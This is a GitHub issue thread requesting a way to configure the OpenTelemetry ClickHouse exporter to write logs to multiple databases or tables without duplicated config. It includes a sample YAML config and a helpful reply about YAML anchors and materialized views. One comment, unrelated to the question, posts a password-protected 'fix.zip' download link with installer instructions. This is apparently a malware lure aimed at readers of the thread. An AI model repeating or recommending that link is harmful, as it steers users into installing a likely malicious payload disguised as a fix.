### ISSUE TITLE
Configuration to support pushing logs to multiple databases/tables using a single CH exporter config.

### ISSUE THREAD

**Issue by tmal94** [open-telemetry/opentelemetry-collector-contrib#34904]
### Component(s)

exporter/clickhouse

### Is your feature request related to a problem? Please describe.

We are using CH exporter to route/push logs to different databases/tables based on certain conditions/filter. Below is an example config.

        clickhouse/test1:
          create_schema: false
          database: xxxx
          endpoint: http://host?dial_timeout=10s&compress=lz4&async_insert=1
          logs_table_name: logs1
          retry_on_failure:
            enabled: true
            initial_interval: 5s
            max_elapsed_time: 300s
            max_interval: 30s
          sending_queue:
            queue_size: 10
          timeout: 60s
          ttl: 168h
        clickhouse/test2:
          create_schema: false
          database: xxxx
          endpoint: http://host?dial_timeout=10s&compress=lz4&async_insert=1
          logs_table_name: logs2
          retry_on_failure:
            enabled: true
            initial_interval: 5s
            max_elapsed_time: 300s
            max_interval: 30s
          sending_queue:
            queue_size: 10
          timeout: 60s
          ttl: 168h

### Describe the solution you'd like

Since every time we add a new table or database in the config we end up copying the same set of exporter configuration which makes the resultant config bulky and error prone. So as a part of solution we would want to define the CH exporter config once and define multiple tables based on labels/markers.

**Comment by LC-JiaZhaorong** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by SpencerTorres** [comment]
Have you tried YAML anchors or similar syntax for reusing parts of the config? (I'm not sure if the parser handles this syntax)

You could also do multiple materialized views that receive logs in a single table and then forwards them into multiple tables, but this may slightly affect the overall architecture that you're going for
